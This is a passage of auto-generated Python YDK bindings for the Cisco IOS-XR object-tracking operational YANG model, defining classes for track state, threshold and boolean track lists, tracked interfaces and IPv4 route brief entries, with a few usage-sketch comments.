('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('state_change_counter', (YLeaf(YType.uint32, 'state-change-counter'), ['int'])),
('seconds_last_change', (YLeaf(YType.uint64, 'seconds-last-change'), ['int'])),
('threshold_up', (YLeaf(YType.uint32, 'threshold-up'), ['int'])),
('threshold_down', (YLeaf(YType.uint32, 'threshold-down'), ['int'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.state_change_counter = None
self.seconds_last_change = None
self.threshold_up = None
self.threshold_down = None
self.track_type_info = ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self.bool_tracks = ObjectTracking.Tracks.Track.TrackInfo.BoolTracks()
self.bool_tracks.parent = self
self._children_name_map["bool_tracks"] = "bool-tracks"
self.threshold_tracks = ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks()
self.threshold_tracks.parent = self
self._children_name_map["threshold_tracks"] = "threshold-tracks"
self.tracking_interaces = ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces()
self.tracking_interaces.parent = self
self._children_name_map["tracking_interaces"] = "tracking-interaces"
self.delayed = ObjectTracking.Tracks.Track.TrackInfo.Delayed()
self.delayed.parent = self
self._children_name_map["delayed"] = "delayed"
self._segment_path = lambda: "track-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo, ['tracke_name', 'type', 'track_state', 'state_change_counter', 'seconds_last_change', 'threshold_up', 'threshold_down'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo']['meta_info']
class BoolTracks(_Entity_):
"""
boolean objects
.. attribute:: bool_track_info
bool track info
**type**\: list of :py:class:`BoolTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.BoolTracks.BoolTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.BoolTracks, self).__init__()
self.yang_name = "bool-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("bool-track-info", ("bool_track_info", ObjectTracking.Tracks.Track.TrackInfo.BoolTracks.BoolTrackInfo))])
self._leafs = OrderedDict()
self.bool_track_info = YList(self)
self._segment_path = lambda: "bool-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.BoolTracks, [], name, value)
class BoolTrackInfo(_Entity_):
"""
bool track info
.. attribute:: object_name
Object Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: with_not
Track object with Not
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.BoolTracks.BoolTrackInfo, self).__init__()
self.yang_name = "bool-track-info"
self.yang_parent_name = "bool-tracks"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('with_not', (YLeaf(YType.boolean, 'with-not'), ['bool'])),
])
self.object_name = None
self.track_state = None
self.with_not = None
self._segment_path = lambda: "bool-track-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.BoolTracks.BoolTrackInfo, ['object_name', 'track_state', 'with_not'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.BoolTracks.BoolTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.BoolTracks']['meta_info']
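# Interpretation sketch for boolean track lists (an assumption about the
# AND/OR list semantics, which the model itself does not state): each
# BoolTrackInfo member contributes its state, negated when 'with_not' is set.
#
#     # 'bool_tracks' is a hypothetical, populated BoolTracks instance
#     states = [(not m.track_state) if m.with_not else m.track_state
#               for m in bool_tracks.bool_track_info]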
class ThresholdTracks(_Entity_):
"""
Threshold objects
.. attribute:: threshold_track_info
threshold track info
**type**\: list of :py:class:`ThresholdTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks.ThresholdTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks, self).__init__()
self.yang_name = "threshold-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold-track-info", ("threshold_track_info", ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks.ThresholdTrackInfo))])
self._leafs = OrderedDict()
self.threshold_track_info = YList(self)
self._segment_path = lambda: "threshold-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks, [], name, value)
class ThresholdTrackInfo(_Entity_):
"""
threshold track info
.. attribute:: object_name
Object name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
.. attribute:: weight
Weight is the number assigned to a track object. For a threshold weight list (i.e. a weighted sum list), the weight is assigned by the user at configuration time. For a threshold percentage list (i.e. a percentage based list), the weight is computed internally as (1/N)x100, where N is the number of objects in the list
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: percentage
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks.ThresholdTrackInfo, self).__init__()
self.yang_name = "threshold-track-info"
self.yang_parent_name = "threshold-tracks"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('weight', (YLeaf(YType.uint32, 'weight'), ['int'])),
])
self.object_name = None
self.track_state = None
self.weight = None
self._segment_path = lambda: "threshold-track-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks.ThresholdTrackInfo, ['object_name', 'track_state', 'weight'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks.ThresholdTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks']['meta_info']
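# Worked example of the weight semantics documented on ThresholdTrackInfo:
# in a percentage based list each member's weight is (1/N)x100, so a list
# of four objects yields 25 per member; in a weighted sum list the weight
# is whatever the user configured.
#
#     n = 4
#     per_member_weight = (1.0 / n) * 100   # -> 25.0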
class TrackingInteraces(_Entity_):
"""
Tracking Interfaces
.. attribute:: interface_tracking_info
interface tracking info
**type**\: list of :py:class:`InterfaceTrackingInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces.InterfaceTrackingInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces, self).__init__()
self.yang_name = "tracking-interaces"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracking-info", ("interface_tracking_info", ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces.InterfaceTrackingInfo))])
self._leafs = OrderedDict()
self.interface_tracking_info = YList(self)
self._segment_path = lambda: "tracking-interaces"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces, [], name, value)
class InterfaceTrackingInfo(_Entity_):
"""
interface tracking info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, self).__init__()
self.yang_name = "interface-tracking-info"
self.yang_parent_name = "tracking-interaces"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracking-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces.InterfaceTrackingInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces']['meta_info']
class Delayed(_Entity_):
"""
Is the state change delay counter in progress
.. attribute:: time_remaining
The time remaining in seconds for the counter to trigger state change
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: track_state
State the track will transition to. True means the track will come up; False means it will go down
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.Delayed, self).__init__()
self.yang_name = "delayed"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.time_remaining = None
self.track_state = None
self._segment_path = lambda: "delayed"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.Delayed, ['time_remaining', 'track_state'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.Delayed']['meta_info']
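# Usage sketch: a non-zero delay counter means a state change is pending.
# 'info' is a hypothetical TrackInfo instance read from a device.
#
#     if info.delayed.time_remaining:
#         pending = 'up' if info.delayed.track_state else 'down'
#         print('track goes %s in %d seconds' % (pending, info.delayed.time_remaining))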
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks']['meta_info']
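# Usage sketch: the Tracks table is keyed by track-name, so individual
# entries can be matched after a read. 'provider' is a NetconfServiceProvider
# as in the earlier sketch; the track name is a hypothetical placeholder.
#
#     data = CRUDService().read(provider, ObjectTracking())
#     for track in data.tracks.track:
#         if track.track_name == 'UPLINK-TRACK':
#             for info in track.track_info:
#                 print(info.track_state, info.state_change_counter)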
class TrackTypeIpv4RouteBrief(_Entity_):
"""
Object Tracking Type Ipv4 Route brief info
.. attribute:: track_info_brief
track info brief
**type**\: list of :py:class:`TrackInfoBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief, self).__init__()
self.yang_name = "track-type-ipv4-route-brief"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info-brief", ("track_info_brief", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief))])
self._leafs = OrderedDict()
self.track_info_brief = YList(self)
self._segment_path = lambda: "track-type-ipv4-route-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief, [], name, value)
class TrackInfoBrief(_Entity_):
"""
track info brief
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief, self).__init__()
self.yang_name = "track-info-brief"
self.yang_parent_name = "track-type-ipv4-route-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.track_type_info = ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self._segment_path = lambda: "track-info-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief, ['tracke_name', 'type', 'track_state'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/track-info-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, self).__init__()
